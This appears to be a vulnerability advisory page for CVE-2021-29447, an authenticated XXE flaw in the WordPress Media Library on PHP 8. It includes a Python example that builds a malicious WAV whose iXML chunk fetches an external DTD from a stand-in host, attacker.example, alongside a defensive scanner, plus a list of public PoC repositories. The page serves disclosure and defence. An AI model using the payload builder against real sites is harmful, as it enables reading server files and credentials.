CVE-2021-29447
WordPress Authenticated XXE attack when installation is running PHP 8
In short
WordPress users with the upload_files capability (the Author role and above) can upload a crafted media file that makes the Media Library's metadata parser resolve external XML entities and read files on the server, but only when the site runs PHP 8. Fixed in WordPress 5.7.1; the fix was also backported to the older affected branches as minor releases.
Technical detail
An authenticated XXE (XML External Entity) vulnerability exists in the WordPress Media Library when the site runs on PHP 8. On upload, the Media Library hands audio files to the bundled getID3 library to extract metadata, and the XML metadata embedded in such a file (the public write-ups use the iXML chunk of a WAV file) is parsed with entity substitution enabled. On PHP 8 the libxml_disable_entity_loader() safeguard that blocked external entity loading on earlier PHP versions is deprecated and is no longer applied on this code path, so a DOCTYPE inside the uploaded file can declare external entities that the parser resolves. A user with upload permission can therefore read files the web server process can read (the public PoCs pull wp-config.php through the php://filter wrapper and exfiltrate it out of band to an attacker-controlled host); XXE also lets the attacker make the WordPress host issue server-side requests. The attack requires an authenticated account with the upload_files capability (Author or higher) and a PHP 8 runtime. Fixed in WordPress 5.7.1 and in the minor releases backported to older affected branches. Quick check: compare $wp_version in wp-includes/version.php with the PHP version reported by php -v; a site on PHP 7.x is not exploitable through this bug but should still take the update.
Summary generated and translated by AI from the official description.
WordPress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
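The carrier file and a matching upload-side check, as an added example (not code from this page, from the listed PoC repositories, or from WordPress). It assumes the vector described in the public write-ups, a WAV whose iXML chunk getID3 parses as XML, and uses a hypothetical attacker host (attacker.example) for the external DTD. The first half builds a RIFF/WAVE container with a constructed iXML payload in the shape the public PoCs use (a parameter entity fetching an external DTD; the DTD that does the php://filter read is not reproduced). The second half is a scanner that walks the RIFF chunks and flags DOCTYPE declarations and external entities in iXML metadata without ever handing the bytes to an XML parser, which is the kind of pre-filter an upload pipeline can run in front of getID3.

```python
"""CVE-2021-29447 carrier and scanner (added example; not code from this page,
the listed PoC repositories or WordPress).

Assumptions: the vector is a WAV file whose iXML chunk getID3 parses as XML
(as the public write-ups describe), and attacker.example is a hypothetical host.
"""
import re
import struct

# Hypothetical attacker-controlled DTD location (assumption, for illustration).
ATTACKER_DTD_URL = "http://attacker.example/xxe.dtd"


def build_riff_wave(chunks):
    """Assemble a RIFF/WAVE container from (fourcc, payload) pairs.
    Odd-length payloads get the pad byte the RIFF format requires."""
    body = b"WAVE"
    for fourcc, payload in chunks:
        if len(fourcc) != 4:
            raise ValueError("chunk id must be four bytes")
        body += fourcc + struct.pack("<I", len(payload)) + payload
        if len(payload) % 2:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data):
    """Walk a RIFF/WAVE file, yielding (fourcc, payload).
    Non-RIFF input or a chunk size overrunning the file ends the walk quietly:
    an upload filter should reject on what it found, not crash on what it did not."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) < size:
            return  # truncated chunk
        yield fourcc, payload
        pos += 8 + size + (size % 2)


def build_xxe_wav(dtd_url=ATTACKER_DTD_URL):
    """Constructed payload in the shape the public PoCs use: a DOCTYPE whose
    parameter entity fetches an external DTD. The DTD itself (which in the PoCs
    reads a file through php://filter and sends it to the attacker in a URL)
    is not reproduced here."""
    ixml = (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE BWFXML [<!ENTITY % remote SYSTEM "' + dtd_url.encode() + b'">%remote;]>'
        b"<BWFXML/>"
    )
    return build_riff_wave([(b"iXML", ixml)])


def build_benign_wav():
    """A minimal legitimate WAV: PCM fmt chunk plus an iXML chunk with no DTD."""
    fmt = struct.pack("<HHIIHH", 1, 1, 44100, 88200, 2, 16)
    ixml = b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>'
    return build_riff_wave([(b"fmt ", fmt), (b"iXML", ixml)])


# Markers of an XXE attempt. Regex heuristics over the raw chunk, not an XML
# parser, so the scanner itself can never resolve an entity.
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.I)
_EXTERNAL_ENTITY = re.compile(
    rb"<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM\s+|PUBLIC\s+\"[^\"]*\"\s+)[\"']([^\"']+)[\"']",
    re.I,
)
_PE_REF = re.compile(rb"%[\w.-]+;")


def scan_wav(data):
    """Inspect every iXML chunk of a WAV upload and report XXE markers.
    Any DOCTYPE at all is treated as suspicious: iXML metadata does not carry
    one in practice, and even an internal-only DTD can still drive entity
    expansion attacks against the parser."""
    result = {"has_ixml": False, "doctype": False,
              "external_entities": [], "parameter_entity_refs": 0}
    for fourcc, payload in iter_chunks(data):
        if fourcc != b"iXML":
            continue
        result["has_ixml"] = True
        text = payload.rstrip(b"\x00")
        if _DOCTYPE.search(text):
            result["doctype"] = True
        for match in _EXTERNAL_ENTITY.finditer(text):
            result["external_entities"].append(match.group(2).decode("latin-1"))
        result["parameter_entity_refs"] += len(_PE_REF.findall(text))
    result["suspicious"] = result["doctype"] or bool(result["external_entities"])
    return result


if __name__ == "__main__":
    for name, blob in (("xxe.wav", build_xxe_wav()), ("clean.wav", build_benign_wav())):
        print(name, scan_wav(blob))
```

Running the module prints the scan result for the constructed payload (DOCTYPE present, one external entity pointing at the hypothetical host) and for the clean file (no findings). The scanner is a pre-filter, not a replacement for the update: it only covers the WAV/iXML chunk, and the real fix is to run a patched WordPress so getID3 never resolves external entities in the first place.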
Affected products
WordPress · wordpress-develop
Public PoCs found: 26
GitHub:
github.com/motikan2010/CVE-2021-29447 ★ 43
github.com/mega8bit/exploit_cve-2021-29447 ★ 7
github.com/0xRar/CVE-2021-29447-PoC ★ 6
github.com/M3l0nPan/wordpress-cve-2021-29447 ★ 4
github.com/Vulnmachines/wordpress_cve-2021-29447 ★ 4
github.com/dnr6419/CVE-2021-29447 ★ 3
github.com/thomas-osgood/CVE-2021-29447 ★ 3
github.com/elf1337/blind-xxe-controller-CVE-2021-29447 ★ 3
github.com/Abdulazizalsewedy/CVE-2021-29447 ★ 2
github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7 ★ 2
github.com/Val-Resh/CVE-2021-29447-POC ★ 1
github.com/b-abderrahmane/CVE-2021-29447-POC ★ 1
github.com/ArtemCyberLab/Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets- ★ 1
github.com/magicrc/CVE-2021-29447 ★ 0
github.com/AssassinUKG/CVE-2021-29447 ★ 0
github.com/G01d3nW01f/CVE-2021-29447 ★ 0
github.com/viardant/CVE-2021-29447 ★ 0
github.com/andyhsu024/CVE-2021-29447 ★ 0
github.com/specializzazione-cyber-security/demo-CVE-2021-29447-lezione ★ 0
github.com/davids52/cve-2021-29447_auto-script ★ 0
github.com/rdana55/CVE-2021-29447-PoC ★ 0
github.com/danilo1992-sys/CVE-2021-29447 ★ 0
github.com/0xricksanchez/CVE-2021-29447 ★ 0
Other sources:
packetstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.html (CVE reference, unverified)
www.exploit-db.com/exploits/50304 (Exploit-DB, unverified)
packetstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.html (CVE reference, unverified)
⚠ Public resources, to assess the exposure of systems you control or are authorized to test. Test only with authorization.
References
http://packetstormsecurity.com/files/163148/XML-External-Entity-Via-MP3-File-Upload-On-WordPress.html
http://packetstormsecurity.com/files/164198/WordPress-5.7-Media-Library-XML-Injection.html
https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
https://lists.debian.org/debian-lts-announce/2021/04/msg00017.html
https://wordpress.org/news/category/security/
https://www.debian.org/security/2021/dsa-4896